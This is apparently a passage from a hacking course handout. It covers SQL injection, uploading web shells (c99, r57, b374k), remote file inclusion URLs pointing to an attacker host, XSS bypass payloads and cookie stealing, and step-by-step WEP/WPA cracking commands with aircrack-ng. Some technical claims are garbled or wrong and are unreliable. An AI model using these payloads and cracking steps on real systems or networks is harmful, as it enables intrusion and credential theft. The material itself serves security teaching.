comes up with a simple report as outcome.

2. Research Honeypot : Which are develeoped by the Govt Agencies for research purpose
or National Security hence they are deployed on area's site like Nuclear power points, oil
pipe line franeowrk controls and etc etc. RH are very expensive in nature , also gives a
very extensive information about any mishappeningoccoured, which is very very difficult
to understand and monitor also.

Blind injection
Blind SQL (Structured Query Language) injection is a type of SQL Injection attack that
asks the database true or false questions and determines the answer based on the
applications response. This attack is often used when the web application is configured
to show generic error messages, but has not mitigated the code that is vulnerable to
SQL injection.
When an attacker exploits SQL injection, sometimes the web application displays error
messages from the database complaining that the SQL Query's syntax is incorrect. Blind
SQL injection is nearly identical to normal SQL Injection, the only difference being the
way the data is retrieved from the database. When the database does not output data
to the web page, an attacker is forced to steal data by asking the database a series of
true or false questions. This makes exploiting the SQL Injection vulnerability more
difficult, but not impossible.

Time based SQL Injection

Time-based techniques are often used to achieve tests when there is no other way to
retrieve information from the database server. This kind of attack injects a SQL segment
which contains specific DBMS function or heavy query that generates a time delay.
Depending on the time it takes to get the server response, it is possible to deduct some
information. As you can guess, this type of inference approach is particularly useful for
blind and deep blind SQL injection attacks.

Injecting a Time Delay:-

Time-based attacks can be used to achieve very basic test like determining if
avulnerability is present. This is usually an excellent option when the attacker is facing a
deep blind SQL injection. In this situation, only delay functions/procedures are
necessary. The table below shows how the query execution can be paused in each
DBMS.

Arbitrary File Uploading

It is a process in which hackers are able to upload a php or asp based control panel of
their functionalities and then access the entire server for the same instead of only
admin panel.

Simple Control Panel:-

1. In simple control panel you cannot see the source code of the pages.

2. You cannot edit, delete and update page directly.

3. You cannot dump the entire database by interacting with through the control panel.

4. You cannot replace the existing pages in LIVE environment.

5. You cannot see the other website's code and other stuff which are on the same server
on which your website is hosted.

Hackers Control Panel:-

1. You can see the entire source code, you can edit the source code and you can delete
the source code.

2. If server have 777 permissions then u can even traverse the entire server HDD and
access other website's data too and damage the same.

3. You can dump the entire data base once you started interaction with the machines.

Shell: The extreme control on something.

Windows Shell : cmd.exe

MAC/Linux : terminal

www.rahul.com ---> Update

training.html -->FTP Connect -->Uplaod--> www.rahul.com

www.rahul.com/hello/main/test/etc/regular/www/upload.php

Step 1: They hack into the admin panel.

Step 2: Look for any upload options like:

- Upload images

- Upload image gallery

- Upload your CV

- Upload the pdf

Step 3: According to the technology and webserver support we will upload our control
panel i.e hackers control panel on the website.

Simple Uploading : When there is no validation on the content file uploading.

For Example: If there is an option for uploading the .jpg file still you can upload and pdf
file. and if you can upload pdf file you can also upload urphp shell file.

www.xyz.com/images/hack.php
Tough Uploading : When web developer deploy an static validation that this type of file
format can only be uploaded.

Hence in this situation its tough but not impossible. :)

Windows : c99.asp , r57.asp , kikicoco.asp

Linux : c99.php , r57.php, b374k.php

The need for automated web application security scanning:-

Manual vulnerability auditing of all your web applications is complex and time
consuming,since it generally involves processing a large volume of data. It also demands
a high level ofexpertise and the ability to keep track of considerable volumes of code
used in a web application. In addition, hackers are constantly finding new ways to
exploit your web application, which means that you would have to constantly monitor
the security communities, and find new vulnerabilities in your web application code
before hackers discover them.

Tools for Automated VAPT:-

1. Acunetix Web Vulnerability Scanner

2. Netsparker Web Vulnerability Scanner

3. OPENZAP OWASP Web Application Scanner

 Introduction to Burp Suite

It’s an application designed to formulate the entire vulnerability assessment criteria in

such a manner, that penetration testers will get a detailed and structured report what
to exploit and what to not.

Mainly Burp Suite contains a large number of attacks and highly popular due to post
parameter discovery.

Instead of looking for vulnerable parameters one by one on the page, we will scan the
entire website and will extract all possible GET and POST hidden parameters which may
or may not be exploitable.

History
Burp Suite comes in action from a company known as Port Swigger. Which mainly works
as a VA tool development organization with respect to OWASP TOP 10 standards.

Home Version: Free of Cost

Pro Version: Paid $299

Burp Suite is coded in Java hence it’s a platform independent application.

.jar file executable in nature.

Permutations and Combinations Based Brute Forcing
In this brute forcing attack, we mainly write or get any script which takes all possible
combinations of a-z, A-Z, 0-9 and all special characters including spacebar etc.

Mainly this attack is deployed via a technology known as Cross Fired Technology from
AMD or SLI technology from NVidia.

This makes it possible to run two or more graphics cards at a same time to execute this
brute forcing process hence with more core speed via the graphics card it gives a way
much stable speed and results in quick manner as compare to a simple CPU holding
computer.

For Example: Fire force Mozilla Plugin or HYRDA.

Dictionary Based Brute Forcing

In this attack we try to match a certain number of possible passwords on the target to
guess the credentials. In this attack we use millions of password stored dictionary to
attempt brute force attack.

For Example: Burp Suite

 File Inclusion Vulnerability

It’s an attack in which we try to execute certain files by including these files in an out dated CSS part of
the website known as include function.

This include function accepts any kind of executable code file from any untrusted source and include the
same code in the existing page on which the include function is deploying.

Remote File Inclusion

www.bank.com/load.html?include=http://www.hi.com/rs.jsp

RFI Shell

www.bank.com/load.html?include=www.hacker.com/shell.php

Command Execution Vulnerability

When any website gives you an interaction point to execute a certain level of shell
based commands through the application layer then we can say website is vulnerable to
command execution vulnerability.

127.0.0.1: Ping ---> server (cmd.exe) ---> output --> show

Once Server gives reply of Ping Command, then we can execute any kind of command in
server.
 Introduction to Java Script

It is concerned with the behavior of the webpages depends upon the user inputs. Mainly
deployed on the dynamic webpages for the validation purposes.

For Example: A simple java script code can be deployed to execute a client side
validation of checking the input for SQL Injection.

Syntax:
<script> ---> Starting Tag

</script> ---> Ending Tag

Alert: This function is used to draw a pop up box known as dialogue box. Whatever
the body content of the function is written into it. It will show it as text on the box.

Syntax: <script>alert () </script>

Here You can write two type of data types. First String Based and Integer.
<script>alert ("Welcome to Site”) </script>

<script>alert (1) </script>

Prompt: It is same as alert but also given a text field to write your own text. But it will
not affect the working of the pop up hence only with read only property.

<script>prompt("hi”) </script>

Stealing Sessions via Cookies

Every website contains a cookie and respective session in browser memory hence if we are
able to get the cookie we can embed the same cookie in our browser and as we open the
same site will be going to enter into the same session of the victim.
<script>alert (document. Cookie) </script>

Cross Site Scripting

XSS(Cross Site Scripting Vulnerability): It’s a OWASP TOP 10 3rd vulnerability found mostly
in 80% of all dynamic websites.

Why XSS Occurs: When any website takes any kind of executable input from any
unauthorized visitor then we can say that website is vulnerable to XSS attack.

For Example: While Shopping in Flipkart some user entering <h1>Hacked</h1> in search
bar and as he hit search website understand the heading tag and executes it on main
page.

Types of XSS

1. Reflected XSS | Temp. XSS: This XSS only effects a particular user’s browser hence will
not remain permanent for the victors of the website.

Attacks Possible: Criminal can add a form on the vulnerable link and send an Input form
with details like Name, Credit Card no, Password, PINCODE etc. YES, if the vulnerability is
on any Banking website.

2. Stored XSS | Permanent XSS: If the input field is attached to the database then we can
say that it’s a stored XSS.

For Example: Hacker inputs a malicious java script code to steal cookies of all the visitors
of the website who visits for online shopping or banking etc. It can be worse via keylogger
too.
 Requirements
--------------
1. Basics of HTML
2. Basics of JAVA SCRIPT
3. DVWA: Reflected + Stored (Low + Medium)

Validation Bypass Payload

></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>

<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>

Broken Authentication Session Management

Application functions related to authentication and session management are often not
implemented correctly, allowing attackers to compromise passwords, keys, or session
tokens, or to exploit other implementation flaws to assume other users’ identities.

Source

Cross-Site Request Forgery

A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request,
including the victim’s session cookie and any other automatically included
authentication information, to a vulnerable web application. This allows the attacker to
force the victim’s browser to generate requests the vulnerable application thinks are
legitimate requests from the victim.

Source
 Missing Functional Level Access Control
Most web applications verify function level access rights before making that
functionality visible in the UI. However, applications need to perform the same access
control checks on the server when each function is accessed. If requests are not verified,
attackers will be able to forge requests in order to access functionality without proper
authorization.

Source

Invalidated Redirects And Forwards

Web applications frequently redirect and forward users to other pages and websites,
and use untrusted data to determine the destination pages. Without proper validation,
attackers can redirect victims to phishing or malware sites, or use forwards to access
unauthorized pages.

HTTP response splitting

HTTP response splitting is a form of web application vulnerability, resulting from the
failure of the application or its environment to properly sanitize input values. It can be
used to perform cross-site scripting attacks, cross-user defacement, web cache
poisoning, and similar exploits.

Source
 LINUX BASICS

1.Command: ls
The command “ls” stands for (List Directory Contents), List the contents of the folder, be
it file or folder, from which it runs.

root@tecmint:~# ls

Android-Games Music

Pictures Public

Desktop Tecmint.com

Documents TecMint-Sync

Downloads Templates

The command “ls -l” list the content of folder, in long listing fashion.

root@tecmint:~# ls -l

total 40588

drwxrwxr-x 2 ravisaiveravisaive 4096 May 8 01:06 Android Games

drwxr-xr-x 2 ravisaiveravisaive 4096 May 15 10:50 Desktop

drwxr-xr-x 2 ravisaiveravisaive 4096 May 16 16:45 Documents

drwxr-xr-x 6 ravisaiveravisaive 4096 May 16 14:34 Downloads

drwxr-xr-x 2 ravisaiveravisaive 4096 Apr 30 20:50 Music

drwxr-xr-x 2 ravisaiveravisaive 4096 May 9 17:54 Pictures

drwxrwxr-x 5 ravisaiveravisaive 4096 May 3 18:44 Tecmint.com

drwxr-xr-x 2 ravisaiveravisaive 4096 Apr 30 20:50 Templates

Command “ls -a“, list the content of folder, including hidden files starting with ‘.’.

root@tecmint:~# ls -a

. .gnupg .dbus
.goutputstream-PI5VVW .mission-control

.adobedeja-dup .grsync .mozilla .themes

.gstreamer-0.10 .mtpaint .thumbnails .gtk-bookmarks .thunderbird

.HotShots .mysql_history .htaccess .apport-ignore.xml .ICEauthority

.profile .bash_history .icons .bash_logout .fbmessenger

.jedit .pulse .bashrc .liferea_1.8 .pulse-cookie

.Xauthority .gconf .local .Xauthority.HGHVWW .cache

.gftp .macromedia .remmina .cinnamon .gimp-2.8

.ssh .xsession-errors .compiz .gnome teamviewer_linux.deb

.xsession-errors.old .config .gnome2 .zoncolor

2.Command: lsblk
The “lsblk” stands for (List Block Devices), print block devices by their assigned name
(but not RAM) on the standard output in a tree-like fashion.

root@tecmint:~# lsblk

NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT

sda 8:0 0 232.9G 0 disk

├─sda1 8:1 0 46.6G 0 part /

├─sda2 8:2 0 1K 0 part

├─sda5 8:5 0 190M 0 part /boot

├─sda6 8:6 0 3.7G 0 part [SWAP]

├─sda7 8:7 0 93.1G 0 part /data

└─sda8 8:8 0 89.2G 0 part /personal

sr0 11:0 1 1024M 0 rom

The “lsblk -l” command list block devices in ‘list‘ structure (not tree like fashion).

root@tecmint:~# lsblk -l
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT

sda 8:0 0 232.9G 0 disk

sda1 8:1 0 46.6G 0 part /

sda2 8:2 0 1K 0 part

sda5 8:5 0 190M 0 part /boot

sda6 8:6 0 3.7G 0 part [SWAP]

sda7 8:7 0 93.1G 0 part /data

sda8 8:8 0 89.2G 0 part /personal

sr0 11:0 1 1024M 0 rom

Note: lsblk is very useful and easiest way to know the name of New Usb Device you just
plugged in, especially when you have to deal with disk/blocks in terminal.
3.Command: md5sum
The “md5sum” stands for (Compute and Check MD5 Message Digest), md5 checksum
(commonly called hash) is used to match or verify integrity of files that may have
changed as a result of a faulty file transfer, a disk error or non-malicious interference.

root@tecmint:~# md5sum teamviewer_linux.deb

47790ed345a7b7970fc1f2ac50c97002 teamviewer_linux.deb

Note: The user can match the generated md5sum with the one provided officially.
Md5sum is considered less secure than sha1sum, which we will discuss later.

4.Command: dd
Command “dd” stands for (Convert and Copy a file), Can be used to convert and copy a
file and most of the times is used to copy a iso file (or any other file) to a usb device (or
any other location), thus can be used to make a ‘Bootlable‘ Usb Stick.

root@tecmint:~# dd if=/home/user/Downloads/debian.iso of=/dev/sdb1 bs=512M; sync

Note: In the above example the usb device is supposed to be sdb1 (You should Verify it
using command lsblk, otherwise you will overwrite your disk and OS), use name of disk
very Cautiously!!!.
dd command takes some time ranging from a few seconds to several minutes in
execution, depending on the size and type of file and read and write speed of Usb stick.
5.Command: uname
The “uname” command stands for (Unix Name), print detailed information about the
machine name, Operating System and Kernel.

root@tecmint:~# uname -a

Linux tecmint 3.8.0-19-generic #30-Ubuntu SMP Wed May 1 16:36:13 UTC 2013 i686 i686i686 GNU/Linux
Note: uname shows type of kernel. uname -a output detailed information. Elaborating
the above output ofuname -a.
1. “Linux“: The machine’s kernel name.
2. “tecmint“: The machine’s node name.
3. “3.8.0-19-generic“: The kernel release.
4. “#30-Ubuntu SMP“: The kernel version.
5. “i686“: The architecture of the processor.
6. “GNU/Linux“: The operating system name.
6.Command: history
The “history” command stands for History (Event) Record, it prints the history of long
list of executed commands in terminal.

root@tecmint:~# history

1 sudo add-apt-repository ppa:tualatrix/ppa

2 sudo apt-get update

3 sudo apt-get install ubuntu-tweak

4 sudo add-apt-repository ppa:diesch/testing

5 sudo apt-get update

6 sudo apt-get install indicator-privacy

7 sudo add-apt-repository ppa:atareao/atareao

8 sudo apt-get update

9 sudo apt-get install my-weather-indicator

10 pwd

11 cd &&sudocp -r unity/6 /usr/share/unity/

12 cd /usr/share/unity/icons/

13 cd /usr/share/unity

Note: Pressing “Ctrl + R” and then search for already executed commands which lets
your command to be completed with auto completion feature.

(reverse-i-search)`if': ifconfig

7.Command: mkdir

The “mkdir” (Make directory) command create a new directory with name path.
However is the directory already exists, it will return an error message “cannot create
folder, folder already exists”.

root@tecmint:~# mkdirtecmint

Note: Directory can only be created inside the folder, in which the user has write
permission. mkdir: cannot create directory `tecmint‘: File exists
(Don’t confuse with file in the above output, you might remember what i said at the
beginning – In Linux every file, folder, drive, command, scripts are treated as file).

8.Command: touch
The “touch” command stands for (Update the access and modification times of
each FILE to the current time).touch command creates the file, only if it doesn’t exist. If
the file already exists it will update the timestamp and not the contents of the file.

root@tecmint:~# touch tecmintfile

Note: touch can be used to create file under directory, on which the user has write
permission, only if the file don’t exist there.

9.Command: chmod

The Linux “chmod” command stands for (change file mode bits). chmod changes the file
mode (permission) of each given file, folder, script, etc.. according to mode asked for.
There exist 3 types of permission on a file (folder or anything but to keep things simple
we will be using file).

Read (r)=4

Write(w)=2

Execute(x)=1

So if you want to give only read permission on a file it will be assigned a value of ‘4‘, for
write permission only, a value of ‘2‘ and for execute permission only, a value of ‘1‘ is to
be given. For read and write permission 4+2 = ‘6‘ is to be given, ans so on.
Now permission need to be set for 3 kinds of user and usergroup. The first is owner,
then usergroup and finally world.

rwxr-x--x abc.sh
Here the root’s permission is rwx (read, write and execute).
usergroup to which it belongs, is r-x (read and execute only, no write permission) and
for world is –x (only execute).
To change its permission and provide read, write and execute permission to owner,
group and world.

root@tecmint:~# chmod 777 abc.sh

Only read and write permission to all three.

root@tecmint:~# chmod 666 abc.sh

Read, write and execute to owner and only execute to group and world.

root@tecmint:~# chmod 711 abc.sh

Note: one of the most important command useful for sysadmin and user both. On a
multi-user environment or on a server, this command comes to rescue, setting wrong
permission will either makes a file inaccessible or provide unauthorized access to
someone.

10.Command: apt

The Debian based “apt” command stands for (Advanced Package Tool). Apt is an
advanced package manager for Debian based system (Ubuntu, Kubuntu, etc.), that
automatically and intelligently search, install, update andresolves dependency of
packages on Gnu/Linux system from command line.
root@tecmint:~# apt-get install mplayer

Reading package lists... Done

Building dependency tree

Reading state information... Done

The following package was automatically installed and is no longer required:

java-wrappers

Use 'apt-get autoremove' to remove it.

The following extra packages will be installed:

esound-common libaudiofile1 libesd0 libopenal-data libopenal1 libsvga1 libvdpau1 libxvidcore4

Suggested packages:

pulseaudio-esound-compat libroar-compat2 nvidia-vdpau-driver vdpau-driver mplayer-doc netselectfping

The following NEW packages will be installed:

esound-common libaudiofile1 libesd0 libopenal-data libopenal1 libsvga1 libvdpau1 libxvidcore4 mplayer

0 upgraded, 9 newly installed, 0 to remove and 8 not upgraded.

Need to get 3,567 kB of archives.

After this operation, 7,772 kB of additional disk space will be used.

Do you want to continue [Y/n]? y

root@tecmint:~# apt-get update

Hit http://ppa.launchpad.net raring Release.gpg

Hit http://ppa.launchpad.net raring Release.gpg

Hit http://ppa.launchpad.net raring Release.gpg

Hit http://ppa.launchpad.net raring Release.gpg

Get:1 http://security.ubuntu.com raring-security Release.gpg [933 B]

Hit http://in.archive.ubuntu.com raring Release.gpg

Hit http://ppa.launchpad.net raring Release.gpg

Get:2 http://security.ubuntu.com raring-security Release [40.8 kB]

Ign http://ppa.launchpad.net raring Release.gpg

Get:3 http://in.archive.ubuntu.com raring-updates Release.gpg [933 B]

Hit http://ppa.launchpad.net raring Release.gpg

Hit http://in.archive.ubuntu.com raring-backports Release.gpg

Note: The above commands results into system-wide changes and hence requires root password (Check ‘#‘ and not

‘$’ as prompt). Apt is considered more advanced and intelligent as compared to yum command.

As the name suggest, apt-cache search for package containing sub package mpalyer. apt-get install, update all the

packages, that are already installed, to the newest one.

Read more about apt-get and apt-cache commands at 25 APT-GET and APT-CACHE Commands.
 (source:-www.tecmint.com)

Introduction to Network Security

Network Security is the process of securing the network in such a way that no
unauthorized person can make harm to our network. Basic purpose of securing network
is to secure data of systems lying in our network. Network Security is a level of
guarantee that all machines in a network are working properly and secure way. Network
Security consists of various policies, to prevent and monitor unauthorized access,
misuse, modification, denial of computer peripherals. Network Security involves the
authorization of access to data in a network to legitimate users, which is controlled by
Network Administrator

Basic of Networking
Routers
Switches
Internet
Intranet
Network- LAN, MAN, WAN
Terminologies
Star, Ring, Bus, Mesh.
IP- Public Private
Default Gateways

Basic Network Scanning

Nmap
Advance IP Scanner

Introduction to Wireless Networking

Wireless Network comes into action when the use of physical network starts becomes
trouble for mesh network. Physical Network is difficult to maintain and it is expensive as
various physical mediums required for establishing connection with end users. Physical
Medium includes Switches, Hubs, Cables, Connections, and Maintenances etc.

IEEE Standards comes up with a wireless networking techniques known as WIFI

WIFI- Wireless Fidelity

They execute this action via a router having DHCP inbuilt in it. First Company to link
come you with this Wireless Router: DLINK

In starting it creates a problem for network administrator for maintaining its network as
any person can connect to a network without having any authentication process so it
becomes more unsecure as compared to physical.

So Security Authentication comes into action:

WEP- Wired Equivalent Privacy

WPA- Wi-Fi Protected Access

WPA2- WIFI Protected Access with AES/CCMP

AES- Advanced Encryption Standards

WEP stands for Wired Equivalent Privacy.

• It is 802.11's first hardware form of security where the user and

• Encryption key of either 64 bits or 128 bits in HEX.

• Challenge Key for User to authenticate

WPA stands for Wi-Fi Protected Access.

• It builds upon WEP, to make it more secure by adding extra security mechanism
and algorithms to stop unauthorized access.

• WPA delivers a level of security way beyond anything that WEP can offer.

• It's a new security standard adopted by the Wi-Fi Alliance.

WPA2 Wi-Fi Protected Access with AES

• The primary difference between WPA and WPA2 is that WPA2 uses a more
advanced encryption technique called AES (Advanced Encryption Standard)

• We prefer WPA2 because it has more than three protection levels, making it
nearly impossible for computer guru hackers to break the encryption.

• AES is so good that it blocks statistical analysis of the cipher text. WPA2 is based
upon the Institute for Electrical and Electronics Engineers’ (IEEE)

Basic Terms for wireless Network

1. Access Point (AP)

2. Clients

3. Broadcasting

4. Beacons Packets

5. Data Packets
6. IV’s

7. ESSID

8. BSSID

9. Channels

10. Authentication

11. Deauthentication

12. Association

13. Interfaces

Network Attacks

Network Attacks:

• DOS Attack

• Brute Force Attack

• Network Sniffing

• Botnet Attack

ARP Poisoning
In computer networking, ARP spoofing, ARP cache poisoning, or ARP poison routing, is a
technique by which an attacker sends (spoofed) Address Resolution Protocol (ARP)
messages onto a local area network. Generally, the aim is to associate the attacker's
MAC address with the IP address of another host, such as the default gateway, causing
any traffic meant for that IP address to be sent to the attacker instead.

ARP spoofing may allow an attacker to intercept data frames on a network, modify the
traffic, or stop all traffic. Often the attack is used as an opening for other attacks, such
as denial of service, man in the middle, or session hijacking attacks.

Source

SSL Striping
 Heart Bleed

Vulnerable Heart of Internet i.e SSL

The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic

software library. This weakness allows stealing the information protected, under normal
conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides
communication security and privacy over the Internet for applications such as web,
email, instant messaging (IM) and some virtual private networks (VPNs).

The Heartbleed bug allows anyone on the Internet to read the memory of the systems
protected by the vulnerable versions of the OpenSSL software. This compromises the
secret keys used to identify the service providers and to encrypt the traffic, the names
and passwords of the users and the actual content. This allows attackers to eavesdrop
on communications, steal data directly from the services and users and to impersonate
services and users.

Shell Shock
Shellshock” refers to vulnerabilities found in Bash, a common command-line shell for
Linux and Unix systems.

Shellshock, also known as Bashdoor, is a Family of Security Bugs in the widely used Unix
Bash shell, the first of which was disclosed on 24 September 2014.

This can allow an attacker to gain unauthorized access to a computer system.

• CVE-2014-6277,

• CVE-2014-6278,

• CVE-2014-7169,

• CVE-2014-7186, and

• CVE-2014-7187

Capture Wireless Communication Packet

Capturing of packets by sitting in between the AP and its users, this process can be done by two ways
i.e. GUI and CLI based application.

For GUI we can use Wireshark Packet Capturing Tool, which comes for windows and Linux operating
system,

For CLI, a tools called airodump is used, which is in built in Kali Linux

# Configuration Wireless Card

# Wireshark Capturing

# Filtering

# Airodump
 WEP – Wired Equivalent Proxy (1997)

The flaws in WEP make it susceptible to various statistical cracking techniques. WEP
uses RC4 for encryption, and RC4 requires that the initialization vectors (IVs) be random.
The implementation of RC4 in WEP repeats that IV about every

• If we can capture enough number of the IVs, we can decipher/decrypt the key!

# Capturing WEP packet

# Cracking

Tools to automate attacks on wireless network

WEP: (25000 PACKET)

ifconfig -a

ifconfig wlan0 up

airmon-ng start wlan0

airodump-ng mon0

ifconfig -a

airmon-ng start wlan0

airodump-ng mon0

airodump-ng -c 1 -b C8:D3:A3:2F:D6:F4 -w palvinder mon0

airodump-ng

airodump-ng -c 1 --bssidC8:D3:A3:2F:D6:F4 -w palvinder mon0

ls

aircrack-ng palvinder-02.cap
 Attacks On WPA/WPA2

 ifconfig -a
 ifconfig wlan0 up
 airmon-ng start wlan0
 airodump-ng mon0
 ifconfig -a
 airmon-ng start wlan0
 airodump-ng mon0
 airodump-ng -c 1 -b C8:D3:A3:2F:D6:F4 -w palvinder mon0
 airodump-ng
 airodump-ng -c 1 --bssidC8:D3:A3:2F:D6:F4 -w palvinder mon0
 ls
aircrack-ng palvinder-02.cap -w '/root/Desktop/passwords1.lst'

Introduction To Mobile System

A mobile operating system (or mobile OS) is an operating system for smartphones,
tablets, PDAs, or other mobile devices. While computers such as the typical laptop are
mobile, the operating systems usually used on them are not considered mobile ones as
they were originally designed for bigger stationary desktop computers that historically
did not have or need specific "mobile" features. This distinction is getting blurred in
some newer operating systems that are hybrids made for both uses.